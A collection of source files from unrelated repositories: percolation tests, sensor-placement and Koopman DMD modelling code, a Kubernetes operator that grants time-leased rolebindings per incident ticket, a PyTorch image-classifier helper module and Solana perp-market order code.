with pytest.raises(Exception):
self.alg.run()
def test_run_w_residual_pores_and_throats(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg.set_inlets(pores=self.net.pores('top'))
self.alg.set_residual(pores=self.net.pores('bottom'))
self.alg.run()
data = self.alg.results(Pc=20000)
assert sum(data['pore.occupancy']) > 0
assert sum(data['throat.occupancy']) > 0
def test_is_percolating(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water,
access_limited=True)
self.alg.set_inlets(pores=self.net.pores('top'))
self.alg.set_outlets(pores=self.net.pores('bottom'))
self.alg.run()
assert not self.alg.is_percolating(0)
assert self.alg.is_percolating(1e5)
if __name__ == '__main__':
t = OrdinaryPercolationTest()
t.setup_class()
self = t
for item in t.__dir__():
if item.startswith('test'):
print('running test: '+item)
t.__getattribute__(item)()
``` |
{
"source": "Jimmy-INL/pysensors",
"score": 3
} |
#### File: pysensors/optimizers/_ccqr.py
```python
import numpy as np
from ._qr import QR
class CCQR(QR):
"""
Greedy cost-constrained QR optimizer for sensor selection.
Ranks sensors in descending order of "importance" based on
reconstruction performance and sensor cost. Uses a cost-sensitive
version of the QR algorithm.
This method is based on the following work:
Clark, Emily, et al.
"Greedy sensor placement with cost constraints."
IEEE Sensors Journal 19.7 (2018): 2642-2656.
"""
def __init__(self, sensor_costs=None):
"""
Greedy cost-constrained QR optimizer for sensor selection.
This algorithm augments the pivot selection criteria used in the
QR algorithm (with householder reflectors) to take into account
costs associated with each sensors. It is similar to the
:class:`pysensors.optimizers.QR` algorithm in that it returns an array
of sensor locations ranked by importance, but with a definition of
importance that takes sensor costs into account.
Parameters
----------
sensor_costs: np.ndarray, shape [n_features,], optional (default None)
Costs (weights) associated with each sensor.
Positive values will encourage sensors to be avoided and
negative values will cause them to be preferred.
If None, costs will all be set to zero.
Attributes
----------
pivots_ : np.ndarray, shape [n_features]
Ranked list of sensor locations.
"""
super(CCQR, self).__init__()
if sensor_costs is not None and np.ndim(sensor_costs) != 1:
raise ValueError(
"sensor_costs must be a 1D array, "
f"but a {np.ndim(sensor_costs)}D array was given"
)
self.sensor_costs = sensor_costs
def fit(
self,
basis_matrix,
):
"""
Parameters
----------
basis_matrix: np.ndarray, shape [n_features, n_samples]
Matrix whose columns are the basis vectors in which to
represent the measurement data.
optimizer_kws: dictionary, optional
Keyword arguments to be passed to the qr method.
Returns
-------
self: a fitted :class:`pysensors.optimizers.CCQR` instance
"""
n, m = basis_matrix.shape # We transpose basis_matrix below
if self.sensor_costs is None:
self.sensor_costs = np.zeros(n)
if len(self.sensor_costs) != n:
raise ValueError(
f"Dimension of sensor_costs ({len(self.sensor_costs)}) "
f"does not match number of sensors in data ({n})"
)
# Initialize helper variables
R = basis_matrix.conj().T.copy()
p = np.arange(n)
k = min(m, n)
for j in range(k):
u, i_piv = qr_reflector(R[j:, j:], self.sensor_costs[p[j:]])
# Track column pivots
i_piv += j
p[[j, i_piv]] = p[[i_piv, j]]
# Switch columns
R[:, [j, i_piv]] = R[:, [i_piv, j]]
# Apply reflector
R[j:, j:] -= np.outer(u, np.dot(u, R[j:, j:]))
R[j + 1 :, j] = 0
self.pivots_ = p
return self
def qr_reflector(r, costs):
"""
Get the best (Householder) reflector with column pivoting and
a cost function.
The pivoting is biased by a cost function, i.e.
the pivot is chosen as the argmax of :code:`norm(r[:, i]) - costs[i]`,
whereas normally it would be chosen as the argmax of :code:`norm(r[:, i])`.
Parameters
----------
r: np.ndarray, shape [n_features, n_examples]
Sub-array for which the pivot and reflector are to be found
costs: np.ndarray, shape [n_examples,]
Costs for each column (sensor location) in r
Returns
-------
u: np.ndarray, shape [n_features,]
Householder reflector.
i_piv: nonnegative integer
Index of the pivot.
"""
# Norm of each column
dlens = np.sqrt(np.sum(np.abs(r) ** 2, axis=0))
# Choose pivot
i_piv = np.argmax(dlens - costs)
dlen = dlens[i_piv]
if dlen > 0:
u = r[:, i_piv] / dlen
u[0] += np.sign(u[0]) + (u[0] == 0)
u /= np.sqrt(abs(u[0]))
else:
u = r[:, i_piv]
u[0] = np.sqrt(2)
return u, i_piv
```
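A short sketch of the cost-constrained optimizer above on synthetic data; the import path is inferred from the package layout, and the sizes and costs are illustrative.
```python
import numpy as np
from pysensors.optimizers import CCQR  # import path inferred from the package layout

rng = np.random.default_rng(0)
basis_matrix = rng.standard_normal((200, 10))  # 200 candidate locations, 10 modes

costs = np.zeros(200)
costs[:50] = 10.0        # penalize the first 50 locations so they tend to be avoided

opt = CCQR(sensor_costs=costs)
opt.fit(basis_matrix)
print(opt.get_sensors()[:10])  # top-ranked sensors; get_sensors() is inherited from QR
```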
#### File: pysensors/optimizers/_qr.py
```python
from scipy.linalg import qr
from sklearn.base import BaseEstimator
from sklearn.utils.validation import check_is_fitted
class QR(BaseEstimator):
"""
Greedy QR optimizer for sensor selection.
Ranks sensors in descending order of "importance" by applying
the QR algorithm and extracting pivot indices.
See the following reference for more information
Manohar, Krithika, et al.
"Data-driven sparse sensor placement for reconstruction:
Demonstrating the benefits of exploiting known patterns."
IEEE Control Systems Magazine 38.3 (2018): 63-86.
"""
def __init__(self):
"""
Attributes
----------
pivots_ : np.ndarray, shape [n_features]
Ranked list of sensor locations.
"""
self.pivots_ = None
def fit(self, basis_matrix, **optimizer_kws):
"""
Parameters
----------
basis_matrix: np.ndarray, shape [n_features, n_samples]
Matrix whose columns are the basis vectors in which to
represent the measurement data.
optimizer_kws: dictionary, optional
Keyword arguments to be passed to the qr method.
Returns
-------
self: a fitted :class:`pysensors.optimizers.QR` instance
"""
# TODO: implement checks on basis_matrix
_, _, self.pivots_ = qr(basis_matrix.conj().T, pivoting=True, **optimizer_kws)
return self
def get_sensors(self):
"""
Get ranked array of sensors.
Returns
-------
sensors: np.ndarray, shape [n_features,]
Array of sensors ranked in descending order of importance.
Note that if n_features exceeds n_samples, then only the first
n_samples entries of sensors are guaranteed to be in ranked order.
"""
check_is_fitted(self, "pivots_")
return self.pivots_
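if __name__ == "__main__":
    # Illustrative usage sketch (not part of the original module): fit the QR
    # optimizer on a random basis matrix and read back the ranked pivots. The
    # matrix sizes below are arbitrary demonstration values.
    import numpy as np

    basis = np.random.randn(100, 10)  # 100 candidate sensor locations, 10 basis modes
    ranked = QR().fit(basis).get_sensors()
    print(ranked[:10])  # the ten highest-ranked sensor locations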
``` |
{
"source": "Jimmy-INL/SKDMD",
"score": 2
} |
#### File: EXAMPLES/cylinder_re100/example_20d_cyd.py
```python
import numpy as np
import gc
import sys
sys.dont_write_bytecode = True
sys.path.append('../../MODEL_SRC')
from dkdmd import DKDMD
def main(case, noise_level, sigma_list, rank_list):
# Case description
case_name = case + '_noise_level_' + str(noise_level)
## original data
total_number_train_data = 297
# KDMD Options
kdmd_rank_list = rank_list
kernel = 'gaussian'
# kernel = 'polynomial'
for sigma in sigma_list:
for rank in kdmd_rank_list:
config = {
'model_case' : case_name,
'kernel' : kernel,
'sigma' : sigma,
'reduced_rank' : rank
}
case_dir = './' + config['model_case']
data = np.load(case_dir + '/' + str(total_number_train_data) + '_trainData.npz')
# feed with trajectory data
X = data['Xtrain']
tspan = data['tspan']
print('')
print('...KDMD....', ' sigma = ', config['sigma'], ' reduced_rank = ', config['reduced_rank'])
# start modeling with KDMD
kdmdLearner = DKDMD(config)
kdmdLearner.train(X=X, dt=tspan[1]-tspan[0])
kdmdLearner.save_model()
gc.collect()
if __name__ == '__main__':
case = '20d_cylinder'
noise_level = 0
type = 'KDMD'
sigma_list = [3]
rank_list = [180] # [400]
main(case,noise_level,sigma_list, rank_list)
```
#### File: SKDMD/MODEL_SRC/cedmd.py
```python
import numpy as np
import sys
sys.path.insert(0, '../../../')
sys.dont_write_bytecode = True
from SKDMD.MODEL_SRC.edmd import EDMD
from scipy.special import hermitenorm
class CEDMD(EDMD):
"""
    Class for Continuous Extended DMD, with the observable dictionary chosen
    from normalized Hermite polynomials, Gaussian random Fourier features, or
    a Nystrom approximation (the latter is not implemented yet).
"""
def __init__(self, config):
super(CEDMD, self).__init__(config)
self.type = 'c'
if self.dict == 'hermite':
self.model_dir = self.case_dir + '/' + self.type + '-edmd-h' + str(config['hermite_order']) + '-r' + str(config['reduced_rank'])
elif self.dict == 'rff_gaussian':
self.model_dir = self.case_dir + '/' + self.type + '-edmd-rff-' + str(self.rff_number_features) + \
'-gaussian_sigma-'+ str(self.rff_sigma_gaussian) + '-rank-' + str(config['reduced_rank'])
elif self.dict == 'nystrom':
pass
else:
raise NotImplementedError('this functionality has not been implemented!!!')
self.makedir(self.model_dir)
# def get_rff_features_grad_with_gxT(self, x, gxT):
# # x is supposed to be shape (1, N_sysdim)
# # gxT is supposed to be shape = (N_input, N_sysdim)
# return self.gen_rff_features_dot(Xdot=gxT, X=x)
def gen_rff_features_dot(self, Xdot, X):
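        # Chain-rule sketch (added note; it assumes the forward feature map is
        # phi(x) = [cos(x @ rff_z), sin(x @ rff_z)]): then
        # d/dt phi(x(t)) = [-sin(x @ rff_z), cos(x @ rff_z)] * (xdot @ rff_z),
        # which is what M (derivative factors) and R (xdot projections) build below.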
Q = np.matmul(X, self.rff_z)
M = np.hstack([ -np.sin(Q), np.cos(Q) ]) # since it is the grad...so cos -> -sin..
R = np.matmul(Xdot, self.rff_z)
R = np.hstack([R, R])
Fdot = R*M # elementwise multiplication
return Fdot
def compute_deigphi_dt(self, x, xdot, index_selected_modes=None):
if self.FLAG['normalize']:
eta_input_matrix = self.transform_to_eta(x)
etaDot_input_matrix = self.transform_to_eta(xdot)
xdot_input = etaDot_input_matrix
x_input = eta_input_matrix
else:
xdot_input = xdot
x_input = x
if type(index_selected_modes) == type(None):
deigphi_dt = np.matmul(self.gen_grad_dict_dot_f(xdot_input, x_input), self.Koopman['eigenvectors'])
else:
deigphi_dt = np.matmul(self.gen_grad_dict_dot_f(xdot_input, x_input), self.Koopman['eigenvectors'][:,index_selected_modes])
return deigphi_dt
def gen_grad_dict_dot_f(self, Xdot, X):
"""
compute the gradient of phi dot product with f
:type Xdot: np.ndarray
:param Xdot: time derivative of state
:return: generated_gradPhi_dot_f_array
:rtype: np.ndarray
"""
num_sample, num_components = Xdot.shape
if self.dict == 'hermite':
# normalized hermite polynomial
## compute [ [d[H0(x1).. H0(xn)]/dx1,...,d[HN(x1).. HN(xn)]/dx1 ],
# ...
# [d[H0(x1).. H0(xn)]/dxn,...,d[HN(x1).. HN(xn)]/dxn ] ]
generated_feature_array_list = []
feature_list_ddx_list = []
for i_component in range(num_components):
feature_list = []
for order in range(self.hermite_order + 1):
phi_i = hermitenorm(order)
phi_i_dx = np.poly1d.deriv(phi_i)
phi_i_X = np.polyval(phi_i, X)
# update i_component with the derivative one
phi_i_X[:, i_component] = np.polyval(phi_i_dx, X[:, i_component])
feature_list.append(phi_i_X)
feature_list_ddx_list.append(feature_list)
# generate feature array from feature list for each i_component
generated_feature_array = self.gen_cross_component_features(
feature_list=feature_list,
num_sample=num_sample,
num_components=num_components
)
# dot product f with the gradient
Xdot_i_component = Xdot[:, i_component]
Xdot_i_matrix = np.diag(Xdot_i_component)
generated_feature_array_list.append(np.matmul(Xdot_i_matrix, generated_feature_array))
# summing up the dot product for each component
generated_gradPhi_dot_f_array = np.sum(generated_feature_array_list, axis=0)
elif self.dict == 'rff_gaussian':
generated_gradPhi_dot_f_array = self.gen_rff_features_dot(Xdot,X)
elif self.dict == 'nystrom':
pass
else:
raise NotImplementedError("the type of " + self.dict + " is not implemented yet!")
return generated_gradPhi_dot_f_array
```
#### File: SKDMD/MODEL_SRC/ckdmd.py
```python
import sys
import numpy as np
sys.path.insert(0, '../../../')
from SKDMD.MODEL_SRC.kdmd import KDMD
from SKDMD.PREP_DATA_SRC.source_code.lib.utilities import timing
class CKDMD(KDMD):
"""
Class for Kernel DMD
with kernel as
* Gaussian kernel
* polynomial kernel
* linear kernel DMD
"""
def __init__(self, config):
super(CKDMD, self).__init__(config)
self.type = 'c'
self.model_dir = self.case_dir + '/' + self.type + '-kdmd-s' + str(config['sigma']) + '-r' + str(config['reduced_rank'])
self.makedir(self.model_dir)
def compute_deigphi_dt(self, x, xdot):
# compute Ahat between x and self.X
if self.kernel == 'linear':
Ahat = self.computeKernelArray(xdot, self.X)
elif self.kernel == 'gaussian':
# dot_x^i_k * (x^i_k - x^j_k) scalar field from inner product
Ahat_1 = np.tensordot(np.ones(self.X.shape[0]), xdot, axes=0)
Z = np.tensordot(np.ones(self.X.shape[0]), x, axes=0)
Z2 = np.tensordot(np.ones(x.shape[0]), self.X, axes=0)
ZT = np.transpose(Z2,axes=(1,0,2))
ZV = Z - ZT
Ahat_2 = np.einsum('ijk,ijk->ji',Ahat_1,ZV)
# elementwise multiplication with the last kernel thing
newGhat = self.computeKernelArray(x, self.X)
Ahat = Ahat_2 * newGhat * -2.0 / (self.sigma_gaussian**2)
elif self.kernel == 'polynomial':
Ahat_1 = np.matmul(xdot, np.transpose(self.X))
newGhat = self.computeKernelArray(x, self.X)
Ahat = self.power * np.power(newGhat, (self.power - 1)/self.power) * Ahat_1
else:
raise NotImplementedError("this kernel: " + str(self.kernel) + " is not implemented!")
# then compute deigen_phi_dt
deigen_phi_dt = np.matmul(np.matmul(np.matmul(Ahat, self.Q), self.inverse_sigma), self.Koopman['eigenvectorHat'])
return deigen_phi_dt
def computeAhat(self, X, Xdot):
if self.kernel == 'linear':
Ahat = np.matmul(Xdot, np.transpose(X))
elif self.kernel == 'gaussian':
# dot_x^i_k * (x^i_k - x^j_k) scalar field from inner product
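            # Illustrative derivation (assuming the Gaussian kernel is k(x, y) = exp(-||x - y||^2 / sigma^2)):
            # d/dt k(x(t), y) = (-2 / sigma^2) * (xdot . (x - y)) * k(x, y),
            # which the outer-product tensors and einsum below assemble for all sample pairs.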
Ahat_1 = np.tensordot(np.ones(Xdot.shape[0]), Xdot, axes=0)
Z = np.tensordot(np.ones(X.shape[0]), X, axes=0)
ZT = np.transpose(Z,axes=(1,0,2))
ZV = Z - ZT
Ahat_2 = np.einsum('ijk,ijk->ji',Ahat_1,ZV)
# elementwise multiplication with the last kernel thing
Ahat = Ahat_2 * self.Ghat * -2.0 / (self.sigma_gaussian**2)
elif self.kernel == 'polynomial':
Ahat_1 = np.matmul(Xdot, np.transpose(X))
Ahat = self.power * np.power(self.Ghat, (self.power - 1)/self.power) * Ahat_1
else:
raise NotImplementedError("this kernel: " + str(self.kernel) + " is not implemented!")
return Ahat
@timing
def train(self, X, Xdot):
"""
Given X and Xdot, training for Koopman eigenfunctions, eigenvalues, eigenvectors, and Koopman modes
:type X: np.ndarray
:param X: state of the system
:type Xdot: np.ndarray
:param Xdot: time derivative of the state of the system
"""
self.X = X
self.Xdot = Xdot
# prepare scaler
self.prepare_scaler(self.X)
# compute Koopman tuples
self.compute_Koopman_analysis()
```
#### File: SKDMD/MODEL_SRC/lib_analytic_model.py
```python
import sys
import numpy as np
sys.dont_write_bytecode = True
def F_simple_2d_system(x):
"""Simple toy problem with known Koopman eigenfunctions in `Lusch paper`_.
.. warning::
Returned Jacobian is not used any more.
.. _Lusch paper: https://www.nature.com/articles/s41467-018-07210-0/
Note:
In this example, :math:`\mu` = -0.05, :math:`\lambda` = -1.0.
Args:
x (:obj:`numpy.ndarray`): system state.
Returns:
:obj:`np.ndarray` : time derivative.
"""
mu = -0.05
plambda = -1.0
F = np.zeros(x.shape)
F[0] = mu*x[0]
F[1] = plambda*(x[1] - x[0]**2)
return F
def F_duffing_2d_system(x):
"""Simple toy problem with multiple attractors in `Otto's paper`_.
.. _Otto's paper: https://arxiv.org/abs/1712.01378
.. warning::
Returned Jacobian is not used any more.
Note:
In this example, :math:`delta=0.5`, :math:`beta=-1.0`, :math:`alpha=1.0`.
Args:
x (:obj:`numpy.ndarray`): system state.
Returns:
:obj:`np.ndarray` : time derivative.
"""
delta = 0.5
beta = -1.0
alpha = 1.0
F = np.zeros(x.shape)
F[0] = x[1]
F[1] = -delta * x[1] - x[0] * (beta + alpha * x[0]**2)
return F
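if __name__ == '__main__':
    # Illustrative sketch (not part of the original module): integrate the simple
    # 2D system with SciPy and print the final state. The initial condition and
    # time span are arbitrary demonstration values; scipy is assumed available.
    from scipy.integrate import solve_ivp

    x0 = np.array([1.0, 0.5])
    sol = solve_ivp(lambda t, x: F_simple_2d_system(x), (0.0, 10.0), x0)
    print(sol.y[:, -1])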
``` |
{
"source": "jimmyjamesbaldwin/kube-elevate",
"score": 2
} |
#### File: jimmyjamesbaldwin/kube-elevate/handlers.py
```python
import kopf
import kubernetes
import yaml
import os
import requests
import json
import time
from datetime import datetime, timedelta
from kubernetes.client.rest import ApiException
#@<EMAIL>()
#def configure(settings: kopf.OperatorSettings, **_):
# settings.posting.level = logging.WARNING
# settings.watching.connect_timeout = 1 * 60
# settings.watching.server_timeout = 10 * 60
@kopf.on.create('jbaldwin.org', 'v1', 'elevatepermissions')
def create_fn(meta, spec, namespace, logger, body, **kwargs):
name = body['metadata']['name']
namespace = body['metadata']['namespace']
# check if servicenow has an open incident for this - this needs testing!
# https://gallery.technet.microsoft.com/scriptcenter/Get-all-open-ServiceNow-16142d9a
servicenow_url = "https://myservicenow.ruffer.local/"
servicenow_inc = "INC1234567"
get_servicenow_incident_url = servicenow_url + "/api/now/v1/table/incident?sysparm_query=number=" + servicenow_inc
#get_servicenow_incident_response = requests.get(get_servicenow_incident_url, auth=('myusername', 'mybasic<PASSWORD>'))
#if get_servicenow_incident_response.status_code != 200:
# logger.error("Failed to retrieve ServiceNow Inc")
# exit
#json_data = json.loads(get_servicenow_incident_response.json())
#if json_data['active'] != "true":
# logger.error()
#https://stackoverflow.com/questions/35283649/error-in-creating-an-incident-in-servicenow
batch_api = kubernetes.client.BatchV1beta1Api()
#cron_job = batch_api.create_namespaced_cron_job(body=data, namespace=namespace)
#kopf.adopt(cron_job, owner=body)
#logger.info(f"asdasdasd: %s", cron_job)
# create role (one-off setup per namespace)
    path = os.path.join(os.path.dirname(__file__), 'templates/role.yaml')  # a leading '/' would make os.path.join ignore the base directory
tmpl = open(path, 'rt').read()
text = tmpl.format(namespace="default")
data = yaml.safe_load(text)
batch_api = kubernetes.client.RbacAuthorizationV1Api()
try:
batch_api.create_namespaced_role(body=data, namespace=namespace)
except ApiException as e:
if (e.status == 409): # conflict
logger.debug("Role has already been created in this namespace, handling this exception...")
# create rolebinding to elevate user's permissions
    path = os.path.join(os.path.dirname(__file__), 'templates/rolebinding.yaml')  # a leading '/' would make os.path.join ignore the base directory
tmpl = open(path, 'rt').read()
now=int(datetime.timestamp(datetime.now()))
expiry=int(datetime.timestamp(datetime.now() + timedelta(hours=body['spec']['lease-hours'])))
incident_ticket=body['spec']['incident-ticket']
rb_name = "kube-elevate-rb-readwrite-" + body['spec']['incident-ticket'] + "-" + str(int(time.time()))
text = tmpl.format(user=body['spec']['username'],
namespace=body['spec']['namespace'],
expirytime=expiry,
rolebindingname=rb_name)
rb = yaml.safe_load(text)
kopf.adopt(rb, owner=body)
roleBinding = batch_api.create_namespaced_role_binding(body=rb, namespace=namespace)
return {'message': 'Rolebinding created'}
@kopf.on.delete('jbaldwin.org', 'v1', 'elevatepermissions')
def delete(body, **kwargs):
msg = f"Database {body['metadata']['name']} and its Pod / Service children deleted"
return {'message': msg}
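# Illustrative sketch (not part of the original file): a custom resource that would
# exercise the spec fields read by create_fn above. The kind name and field values
# are hypothetical examples inferred from the handler code, not a confirmed CRD.
#
#   apiVersion: jbaldwin.org/v1
#   kind: ElevatePermissions
#   metadata:
#     name: elevate-jane
#     namespace: default
#   spec:
#     username: jane.doe
#     namespace: default
#     incident-ticket: INC1234567
#     lease-hours: 4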
``` |
{
"source": "JimmyJimmbles/aipnd-project",
"score": 2
} |
#### File: JimmyJimmbles/aipnd-project/helpers.py
```python
import PIL
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
from torchvision import datasets, transforms, models
from collections import OrderedDict
import numpy as np
import json
# Global variables
device_check = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
criterion = nn.NLLLoss()
def load_data(data_dir='./flowers'):
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# Set transformation vars
means = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
img_size = 224
max_batch_size = 32
# Set data transformation dict to house all transforms
data_transforms = {
'training': transforms.Compose([transforms.RandomRotation(60),
transforms.RandomResizedCrop(img_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(means, std)]),
'validation': transforms.Compose([transforms.Resize(img_size + max_batch_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize(means, std)]),
'testing': transforms.Compose([transforms.Resize(img_size + max_batch_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize(means, std)])
}
# Set image datasets dict to house all transforms
image_datasets = {
'training': datasets.ImageFolder(train_dir, transform=data_transforms['training']),
'validation': datasets.ImageFolder(valid_dir, transform=data_transforms['validation']),
'testing': datasets.ImageFolder(test_dir, transform=data_transforms['testing']),
}
# Set all data loaders
dataloaders = {
'training': torch.utils.data.DataLoader(image_datasets['training'], batch_size=max_batch_size, shuffle=True),
'validation': torch.utils.data.DataLoader(image_datasets['validation'], batch_size=max_batch_size, shuffle=True),
'testing': torch.utils.data.DataLoader(image_datasets['testing'], batch_size=max_batch_size, shuffle=True)
}
return dataloaders, image_datasets
def label_mapping(file_name):
with open(file_name, 'r') as f:
cat_to_name = json.load(f)
return cat_to_name
def network_setup(model='vgg16', hidden_layers=[2000, 500, 250], lr=0.001, device='cpu'):
    if model is None:
        print("No model was provided, defaulting to vgg16.")
        model = 'vgg16'
    if model == 'vgg16':
        nn_model = models.vgg16(pretrained=True)
    elif model == 'densenet121':
        nn_model = models.densenet121(pretrained=True)
    else:
        # exec() cannot rebind a local variable here; look the architecture up by name instead
        nn_model = getattr(models, model)(pretrained=True)
# Freeze parameters
for param in nn_model.parameters():
param.requires_grad = False
cat_to_name = label_mapping('cat_to_name.json')
output_len = len(cat_to_name)
input_len = nn_model.classifier[0].in_features
classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(input_len, hidden_layers[0])),
('relu1', nn.ReLU()),
('drop1', nn.Dropout(0.2)),
('fc2', nn.Linear(
hidden_layers[0], hidden_layers[1])),
('relu2', nn.ReLU()),
('drop2', nn.Dropout(0.15)),
('fc3', nn.Linear(
hidden_layers[1], hidden_layers[2])),
('relu3', nn.ReLU()),
('drop3', nn.Dropout(0.1)),
('fc4', nn.Linear(
hidden_layers[2], output_len)),
('output', nn.LogSoftmax(dim=1))
]))
# Set the new classifier to the network
nn_model.classifier = classifier
criterion = nn.NLLLoss()
optimizer = optim.Adam(nn_model.classifier.parameters(), lr)
nn_model.to(device)
return nn_model, criterion, optimizer
def validation(model, dataloader, criterion, device='cpu'):
loss = 0
accuracy = 0
for ii, (inputs, labels) in enumerate(dataloader):
# Set inputs and labels based on device
inputs, labels = inputs.to(device), labels.to(device)
# forward pass to get our log probs
log_ps = model.forward(inputs)
batch_loss = criterion(log_ps, labels)
loss += batch_loss.item()
# calc the accuracy
ps = torch.exp(log_ps)
# get top 1 from topk
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
return loss, accuracy
def train_network(nn_model, dataloaders, optimizer, epochs=5, print_every=30, device='cpu'):
steps = 0
# get dataloaders
if type(dataloaders) == type(None):
dataloaders, image_datasets = load_data('./flowers')
print("Traning has started, this may take a while...")
for e in range(epochs):
running_loss = 0
for inputs, labels in dataloaders['training']:
steps += 1
# Set inputs and labels based on device
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
            # Get log probabilities from forward pass
logps = nn_model.forward(inputs)
loss = criterion(logps, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % print_every == 0:
nn_model.eval()
with torch.no_grad():
validation_loss, accuracy = validation(
nn_model, dataloaders['validation'], criterion)
print("Epoch: {}/{}".format(e + 1, epochs),
"Training Loss: {:.3f}".format(
running_loss / print_every),
"Validation Loss: {:.3f}".format(
validation_loss / len(dataloaders['validation'])),
"Validation Accuracy: {:.3f}".format(accuracy / len(dataloaders['validation'])))
running_loss = 0
nn_model.train()
print("Traning Ended!")
def save_nn_checkpoint(model_dict, file_name):
""" Helper funciton to quickly save the nn """
torch.save(model_dict, file_name)
print("Model has been saved as {}".format(file_name))
def load_nn_checkpoint(filepath):
checkpoint = torch.load(filepath)
hidden_layers = [2000, 500, 250]
lr = 0.001
nn_model, criterion, optimizer = network_setup(
checkpoint['arch'], hidden_layers, lr)
nn_model.load_state_dict(checkpoint['state_dict'])
nn_model.classifier = checkpoint['classifier']
nn_model.class_to_idx = checkpoint['class_to_idx']
return nn_model
def process_image(image):
# Set transformation vars
means = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
img_size = 224
max_batch_size = 32
pil_image = PIL.Image.open(image)
image_transforms = transforms.Compose([transforms.Resize(img_size + max_batch_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize(means, std)])
image_tensor = image_transforms(pil_image)
return image_tensor
def predict(image_path, model, topk=5):
# answer found here: https://stackoverflow.com/questions/9777783/suppress-scientific-notation-in-numpy-when-creating-array-from-nested-list
np.set_printoptions(suppress=True, formatter={
'float_kind': '{:0.4f}'.format})
# set model to inference mode and use cpu
model.to('cpu')
model.eval()
image_tensor = process_image(image_path)
# fix for dim found here: https://discuss.pytorch.org/t/expected-stride-to-be-a-single-integer-value-or-a-list/17612
image_tensor = image_tensor.unsqueeze_(0)
with torch.no_grad():
log_ps = model.forward(image_tensor)
    # get top probabilities and labels
ps = torch.exp(log_ps)
ps_top, labels_top = ps.topk(topk)
    # array for probabilities and labels used for mapping labels to their string name
ps_top_arr = np.array(ps_top)[0]
labels_top_arr = np.array(labels_top[0])
class_to_idx = model.class_to_idx
idx_to_class = {x: y for y, x in class_to_idx.items()}
label_list = []
for x in labels_top_arr:
label_list += [idx_to_class[x]]
return ps_top_arr, label_list
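# Illustrative usage sketch (not part of the original module); the checkpoint and
# image paths below are hypothetical placeholders:
#
#     model = load_nn_checkpoint('checkpoint.pth')
#     probs, classes = predict('flowers/test/1/image_06743.jpg', model, topk=5)
#     cat_to_name = label_mapping('cat_to_name.json')
#     print([(cat_to_name[c], p) for c, p in zip(classes, probs)])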
``` |
{
"source": "jimmyjimmy94/mango-explorer",
"score": 2
} |
#### File: mango-explorer/mango/perpmarketoperations.py
```python
import typing
from decimal import Decimal
from solana.publickey import PublicKey
from .account import Account
from .combinableinstructions import CombinableInstructions
from .constants import SYSTEM_PROGRAM_ADDRESS
from .context import Context
from .marketoperations import MarketOperations
from .orders import Order
from .perpmarketinstructionbuilder import PerpMarketInstructionBuilder
from .perpmarket import PerpMarket
from .wallet import Wallet
# # 🥭 PerpMarketOperations
#
# This file deals with placing orders for Perps.
#
class PerpMarketOperations(MarketOperations):
def __init__(self, market_name: str, context: Context, wallet: Wallet,
market_instruction_builder: PerpMarketInstructionBuilder,
account: Account, perp_market: PerpMarket):
super().__init__()
self.market_name: str = market_name
self.context: Context = context
self.wallet: Wallet = wallet
self.market_instruction_builder: PerpMarketInstructionBuilder = market_instruction_builder
self.account: Account = account
self.perp_market: PerpMarket = perp_market
def cancel_order(self, order: Order, ok_if_missing: bool = False) -> typing.Sequence[str]:
self.logger.info(f"Cancelling {self.market_name} order {order}.")
signers: CombinableInstructions = CombinableInstructions.from_wallet(self.wallet)
cancel: CombinableInstructions = self.market_instruction_builder.build_cancel_order_instructions(
order, ok_if_missing=ok_if_missing)
accounts_to_crank = self.perp_market.accounts_to_crank(self.context, self.account.address)
crank = self.market_instruction_builder.build_crank_instructions(accounts_to_crank)
settle = self.market_instruction_builder.build_settle_instructions()
return (signers + cancel + crank + settle).execute(self.context)
def place_order(self, order: Order) -> Order:
client_id: int = self.context.generate_client_id()
signers: CombinableInstructions = CombinableInstructions.from_wallet(self.wallet)
order_with_client_id: Order = order.with_client_id(client_id)
self.logger.info(f"Placing {self.market_name} order {order_with_client_id}.")
place: CombinableInstructions = self.market_instruction_builder.build_place_order_instructions(
order_with_client_id)
accounts_to_crank = self.perp_market.accounts_to_crank(self.context, self.account.address)
crank = self.market_instruction_builder.build_crank_instructions(accounts_to_crank)
settle = self.market_instruction_builder.build_settle_instructions()
(signers + place + crank + settle).execute(self.context)
return order_with_client_id
def settle(self) -> typing.Sequence[str]:
signers: CombinableInstructions = CombinableInstructions.from_wallet(self.wallet)
settle = self.market_instruction_builder.build_settle_instructions()
return (signers + settle).execute(self.context)
def crank(self, limit: Decimal = Decimal(32)) -> typing.Sequence[str]:
signers: CombinableInstructions = CombinableInstructions.from_wallet(self.wallet)
accounts_to_crank = self.perp_market.accounts_to_crank(self.context, None)
crank = self.market_instruction_builder.build_crank_instructions(accounts_to_crank, limit)
return (signers + crank).execute(self.context)
def create_openorders(self) -> PublicKey:
return SYSTEM_PROGRAM_ADDRESS
def ensure_openorders(self) -> PublicKey:
return SYSTEM_PROGRAM_ADDRESS
def load_orders(self) -> typing.Sequence[Order]:
return self.perp_market.orders(self.context)
def load_my_orders(self) -> typing.Sequence[Order]:
all_orders = self.perp_market.orders(self.context)
return list([o for o in all_orders if o.owner == self.account.address])
def __str__(self) -> str:
return f"""« 𝙿𝚎𝚛𝚙𝚜𝙾𝚛𝚍𝚎𝚛𝙿𝚕𝚊𝚌𝚎𝚛 [{self.market_name}] »"""
```
#### File: mango-explorer/mango/tokenvalue.py
```python
import logging
import typing
from decimal import Decimal
from solana.publickey import PublicKey
from solana.rpc.types import TokenAccountOpts
from .context import Context
from .token import Token
# # 🥭 TokenValue class
#
